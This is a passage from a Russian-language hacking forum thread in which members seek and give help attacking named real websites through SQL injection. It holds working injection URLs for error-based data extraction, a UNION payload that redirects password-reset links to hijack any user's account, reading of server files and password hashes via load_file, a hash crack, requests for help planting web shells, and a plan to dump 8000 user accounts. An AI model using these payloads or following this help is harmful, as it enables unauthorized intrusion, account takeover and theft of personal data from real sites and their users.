Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    http://www.nzp.co.nz/company.php?pg=79+and+substring(version(),1,1)=3
    Третья ветка MySQL, про особенности проведения инъекций здеcь можно подробнее прочитать например тут: https://forum.antichat.ru/showpost.php?p=565034&postcount=4
     
    1 person likes this.
  2. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    [hide=1]
    наткнулся на непонятку:
    на сайте есть админка - site/admin/
    через sql inj с load_file вытянул [user()=root@localhost]

    admin/.htaccess
    =>
    AuthType Basic
    AuthName "bla bla"
    AuthUserFile /Users/serveradmin/Documents/.htpasswd
    Require user serveradmin

    файл /Users/serveradmin/Documents/.htpasswd через sql inj не тянется, вполне возможно его и нет.
    есть файл
    admin/.htpasswd
    =>
    admin:t0oQM1tD4/ytw [=> nh84mk]
    jamie:OWkrWXnR/Sr46

    но через admin/nh84mk авторизация не проходит.
    вопрос 1 - там соль (вроде соль же в .htpasswd не используется ?)
    или у меня не хватает прав прочесть /Users/serveradmin/Documents/.htpasswd ?
    или что-то еще ?

    доп инфа:

    /etc/passwd
    =>
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
    _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
    ...

    есть pureftpd.pdb, но как оттуда вытянуть пароли я не нашел

    вопрос 2: если включено экранирование кавычек то into outfile или его вариантом воспользоваться нельзя ?

    сайтом могу за помощь поделиться - я на нем просто тренируюсь :) там ничего интересного нет, кроме самой возможности заиметь дедик :)
    [/hide]
     
  3. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Нету там никакой соли. просто авторизация проходит по /Users/serveradmin/Documents/.htpasswd(на который нет прав для чтения мускулу), а не по admin/.htpasswd
    Если скуль двойная(что это?) - то можно, в обычном случае нельзя.
     
    #12283 Iceangel_, 10 Apr 2010
    Last edited: 10 Apr 2010
  4. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Первые два символа DES-хэша и есть соль.
    PHP:
    <?php
      
    echo crypt ('nh84mk''t0'), "\n";
    ?>
    Code:
    t0oQM1tD4/ytw
    
    Интересно, сколько этот пост проживет? )
     
    2 people like this.
  5. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Ребята, нашел sql inj на сайте и ничего с ней не получается.
    Вот сайт http://www.warsong.ws/exchange/?s=send
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    ' AND NULL UNION SELECT '[COLOR=Red][email protected][/COLOR]',[color="Red"]1[/color]#
    Где 1 - id юзера, [email protected] - твой мейл.

    На него придет ссылка с подтверждением смены пароля для указаного id.
     
  7. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    phpBB 2.0.21 как залить шел с админки??
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    кидай в личку, подмогу чем смогу
     
    1 person likes this.
  9. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Такие вопросы
    1)
    Могу ли я сделать два условия сразу т.е.:

    union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_lastlog,)%20from%20members%20where%20M_country='USA' and M_gender='M' limit+0,1%20--

    т.е. мне нужны только мужики и америкосы. Правельно ли я реализовал запрос? Если нет то как можно реализовать такую задачу

    2)
    При таком запросе без лимита выводится первый в списке, а мне нужно слить 8000 акков что при таком раскладе будет слегка затруднительно)

    union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_lastlog,)%20from%20members%20where%20M_country='USA' and M_gender='M'

    Пробывал делать так (выводится ошибка о не верном типе данных) :
    union%20select%20group_concat(M_uname,0x3a,M_dob,0x3a,M_lastlog,)%20from%20members%20where%20M_country='USA' and M_gender='M'

    (Ногами не пинать. Новичок.)
     
  10. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Подучи хоть немного синтаксис sql и подобные вопросы отпадут
     
  11. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Нашел самую обыкновенную sql inj и никак не могу составить грамотно запрос. Помогите найти решение.
    http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='
     
  12. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+and+substring(version(),1,1)=5--+
    version():
    http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))--+
     
    1 person likes this.
  13. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    спасибо все получилось
     
  14. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    поjaлуста помоqите заливать шелл

     
  15. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Подскажите как отсюда вывести table_name из базы information_schema.tables ?
    http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='
     
  16. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%27+or+%28select+count%28*%29+from+information_schema.tables+group+by+concat%28table_name,floor%28rand%280%29*%202%29%29%29--+

    нубство
     
  17. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    не выводит
     
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Ну просто ппц... реал нубство ты вообще на код смотришь иле тока нажимаешь strg+c и в url strg+v ??
     
  19. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    конечно смотрю! но я не могу получить конкретное значение !
     
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ну так ты пробелы убери, фильтрация от 1-8 класса.
     
Thread Status:
Not open for further replies.